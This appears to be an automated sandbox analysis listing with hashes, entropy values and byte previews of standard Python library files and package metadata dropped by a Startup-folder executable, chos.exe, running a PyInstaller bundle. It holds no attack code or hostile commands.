Entropy (8bit):	6.311142284249784
Encrypted:	false
SSDEEP:	3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
MD5:	A55E57D7594303C89B5F7A1D1D6F2B67
SHA1:	904A9304A07716497CF3E4EAAFD82715874C94F1
SHA-256:	F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
SHA-512:	FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	277776
Entropy (8bit):	6.5855511991551
Encrypted:	false
SSDEEP:	6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
MD5:	F3377F3DE29579140E2BBAEEFD334D4F
SHA1:	B3076C564DBDFD4CA1B7CC76F36448B0088E2341
SHA-256:	B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
SHA-512:	34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	6.220967684620152
Encrypted:	false
SSDEEP:	768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
MD5:	32D76C9ABD65A5D2671AEEDE189BC290
SHA1:	0D4440C9652B92B40BB92C20F3474F14E34F8D62
SHA-256:	838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
SHA-512:	49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157968
Entropy (8bit):	6.854644275249963
Encrypted:	false
SSDEEP:	3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
MD5:	1BA022D42024A655CF289544AE461FB8
SHA1:	9772A31083223ECF66751FF3851D2E3303A0764C
SHA-256:	D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
SHA-512:	2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....\|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_multiprocessing.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35600
Entropy (8bit):	6.416657776501014
Encrypted:	false
SSDEEP:	768:6wehui7ZmQW/3OUDxEiNIJntJ5YiSyvSJz2Ec:whuilG+UDxEiNIJntX7Sy+zO
MD5:	705AC24F30DC9487DC709307D15108ED
SHA1:	E9E6BA24AF9947D8995392145ADF62CAC86BA5D8
SHA-256:	59134B754C6ACA9449E2801E9E7ED55279C4F1ED58FE7A7A9F971C84E8A32A6C
SHA-512:	F5318EBB91F059F0721D75D576B39C7033D566E39513BAD8E7E42CCC922124A5205010415001EE386495F645238E2FF981A8B859F0890DC3DA4363EB978FDBA7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.Y)v.7zv.7zv.7z..zt.7zf,6{t.7zf,4{u.7zf,3{~.7zf,2{{.7z>-6{t.7zv.6z..7z=.6{s.7z>-:{t.7z>-7{w.7z>-.zw.7z>-5{w.7zRichv.7z........PE..d......g.........." ...). ...>......@...............................................%.....`......................................... E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata..6 ...0..."...$..............@..@.data...p....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_overlapped.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55568
Entropy (8bit):	6.3313243577146485
Encrypted:	false
SSDEEP:	1536:+kMm7HdG/l5fW3UguCE+eRIJWtd7SyJds:+wIQUFCEbRIJWtd6
MD5:	A72527454DD6DA346DDB221FC729E3D4
SHA1:	0276387E3E0492A0822DB4EABE23DB8C25EF6E6F
SHA-256:	404353D7B867749FA2893033BD1EBF2E3F75322D4015725D697CFA5E80EC9D0F
SHA-512:	FEFB543D20520F86B63E599A56E2166599DFA117EDB2BEB5E73FC8B43790543702C280A05CCFD9597C0B483F637038283DD48EF8C88B4EA6BAC411EC0043B10A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.{X/.(X/.(X/.(QW_(\/.(H..)Z/.(H..)[/.(H..)P/.(H..)T/.(...)Z/.(X/.(//.(.W.)]/.(.W.)Y/.(...)Y/.(...)Y/.(..3(Y/.(...)Y/.(RichX/.(........................PE..d.....g.........." ...).L...`......@................................................}....`.............................................X................................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...@...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33552
Entropy (8bit):	6.446391764486538
Encrypted:	false
SSDEEP:	384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
MD5:	1C03CAA59B5E4A7FB9B998D8C1DA165A
SHA1:	8A318F80A705C64076E22913C2206D9247D30CD7
SHA-256:	B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
SHA-512:	783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	6.331814573029388
Encrypted:	false
SSDEEP:	1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
MD5:	FE896371430BD9551717EF12A3E7E818
SHA1:	E2A7716E9CE840E53E8FC79D50A77F40B353C954
SHA-256:	35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
SHA-512:	67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...\|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_sqlite3.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128272
Entropy (8bit):	6.294497957566744
Encrypted:	false
SSDEEP:	3072:N+tZdKmXhyn/qO6ItCpz6j5yQyshiKftdIJvQJL:NGZVwnxHssj5lhiYR
MD5:	D4E5BE27410897AC5771966E33B418C7
SHA1:	5D18FF3CC196557ED40F2F46540B2BFE02901D98
SHA-256:	3E625978D7C55F4B609086A872177C4207FB483C7715E2204937299531394F4C
SHA-512:	4D40B4C6684D3549C35ED96BEDD6707CE32DFAA8071AEADFBC682CF4B7520CFF08472F441C50E0D391A196510F8F073F26AE8B2D1E9B1AF5CF487259CC6CCC09
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............................................................[.....`..........................................{..P...P{.........................../..............T...............................@...............H............................text...t........................... ..`.rdata.............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181520
Entropy (8bit):	5.972827303352998
Encrypted:	false
SSDEEP:	3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
MD5:	1C0E3E447F719FBE2601D0683EA566FC
SHA1:	5321AB73B36675B238AB3F798C278195223CD7B1
SHA-256:	63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
SHA-512:	E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_uuid.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25872
Entropy (8bit):	6.591600232213824
Encrypted:	false
SSDEEP:	384:bROw4TUyiIWlIJ0wsaHQIYiSy1pCQxHoQSJIVE8E9VF0NyEIkz:4w4TUyfWlIJ0wT5YiSyvBk2E3kz
MD5:	3ACF3138D5550CA6DE7E2580E076E0F7
SHA1:	3E878A18DF2362AA6F0BDBFA058DCA115E70D0B8
SHA-256:	F9D5008F0772AA0720BC056A6ECD5A2A3F24965E4B470B022D88627A436C1FFE
SHA-512:	F05E90A0FEAA2994B425884AF32149FBBE2E11CB7499FC88CA92D8A74410EDCD62B2B2C0F1ECD1A46985133F7E89575F2C114BD01F619C22CE52F3CF2A7E37C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........p..#..#..#..\#..#..."..#..."..#..."..#..."..#..."..#..."..#..#...#..."..#..."..#..0#..#..."..#Rich..#........PE..d.....g.........." ...).....&......................................................".....`.........................................p9..L....9..x....`.......P.......6.../...p..@...`3..T........................... 2..@............0..8............................text...h........................... ..`.rdata.......0......................@..@.data...p....@.......&..............@....pdata.......P.......(..............@..@.rsrc........`.......*..............@..@.reloc..@....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\_wmi.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38160
Entropy (8bit):	6.338856805460127
Encrypted:	false
SSDEEP:	768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
MD5:	1C30CC7DF3BD168D883E93C593890B43
SHA1:	31465425F349DAE4EDAC9D0FEABC23CE83400807
SHA-256:	6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
SHA-512:	267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\base_library.zip

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI98882\certifi\cacert.pem

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299427
Entropy (8bit):	6.047872935262006
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:	50EA156B773E8803F6C1FE712F746CBA
SHA1:	2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:	94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:	01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI98882\charset_normalizer\md.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.818583535960129
Encrypted:	false
SSDEEP:	96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
MD5:	56FE4F6C7E88212161F49E823CCC989A
SHA1:	16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
SHA-256:	002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
SHA-512:	7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	5.953784637413928
Encrypted:	false
SSDEEP:	3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
MD5:	10116447F9276F10664BA85A5614BA3A
SHA1:	EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
SHA-256:	C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
SHA-512:	C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\METADATA

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5724
Entropy (8bit):	5.120429897887076
Encrypted:	false
SSDEEP:	96:DlkQIUQIhQIKQILbQIRIaMPktjaVMxsxA2ncEvGDfe0HEdwGArNZG0JQTQCQx5Kw:dcPuPwsrcEvGDfe0HENA5w0JQTQ9x59H
MD5:	526D9AC9D8150602EC9ED8B9F4DE7102
SHA1:	DBA2CB32C21C4B0F575E77BBCDD4FA468056F5E3
SHA-256:	D95F491ED418DC302DB03804DAF9335CE21B2DF4704587E6851EF03E1F84D895
SHA-512:	FB13A2F6B64CB7E380A69424D484FC9B8758FA316A7A155FF062BFDACDCA8F2C5D2A03898CD099688B1C16A5A0EDCECFC42BF0D4D330926B10C3FCE9F5238643
Malicious:	false
Preview:	Metadata-Version: 2.3.Name: cryptography.Version: 44.0.0.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\RECORD

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	16286
Entropy (8bit):	5.5843411690874865
Encrypted:	false
SSDEEP:	192:hXy1uJ/l45jEVeK8RThXsI4WJi6LAciTwqUIq+NX6ih5V3Uqd8q:hXFlMEVd2sIJi6LAciTwqU/+96ihL8q
MD5:	14AC8030DE12534736F742CE05989BD6
SHA1:	5495082B702CC31048065B1F6546AF487CB0BC00
SHA-256:	B593F9EDEAA8BA8B3F8DD147D52A27D904E812E544980265DF234D3958B12517
SHA-512:	B1960D3485E44AA6F4FE7C0023AEEBB4FA00CC16F0340F2C90CB5FCBF2D1C32FDC4FBFB8546EA0C740AA44D72F9A8810F8421C65227F9182972491A1DFDFFEBC
Malicious:	false
Preview:	cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-313.pyc,,..cryptography/__pycache__/__init__.cpython-313.pyc,,..cryptography/__pycache__/exceptions.cpython-313.pyc,,..cryptography/__pycache__/fernet

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	5.0373614967294325
Encrypted:	false
SSDEEP:	3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
MD5:	A868F93FCF51C4F1C25658D54F994349
SHA1:	535C88A10911673DEABB7889D365E81729E483A6
SHA-256:	1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
